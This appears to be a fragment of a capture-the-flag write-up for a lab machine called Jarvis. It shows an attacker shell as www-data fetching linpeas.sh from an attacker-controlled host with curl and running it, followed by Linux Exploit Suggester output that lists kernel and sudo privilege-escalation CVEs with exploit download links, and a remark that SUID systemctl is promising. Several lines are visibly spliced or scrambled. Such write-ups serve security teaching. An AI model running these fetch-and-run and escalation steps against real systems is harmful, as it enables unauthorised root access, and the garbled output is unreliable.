PEAS
www-data@jarvis:/tmp$ curl -s http://10.10.14.11:8000/linpeas.sh -o ./linpeas.sh ; chmod 777 ./linpeas.shDelivery complete
Executing PEAS
PEAS also picked up the old sudo version
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
exposure: highly probable
tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},[ debian=9{kernel:4.9.0-*} ],debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
download url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
comments: Requires an active PolKit agent.
[+] [CVE-2017-16995] eBPF_verifier
details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
exposure: probable
tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
download url: https://www.exploit-db.com/download/45010
comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2021-3156] sudo Baron Samedit
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: mint=19,ubuntu=18|20, debian=10
021-3156/zip/mainhttps://codeload.github.com/blasty/CVE-2
[+] [CVE-2021-3156] sudo Baron Samedit 2
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
exposure: less probable
tags: mint=19
download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: less probable
tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
comments: Uses "Stack Clash" technique, works against most SUID-root binaries
on] [CVE-2017-1000253] PIE_stack_corrupti
details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
exposure: less probable
tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
download url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.cFound some vulnerabilities. None of them are confirmed.
There are some compilers installed to the target system.
This is confirmed.
/bin/systemctl with SUID bit set is extremely promising for privilege escalation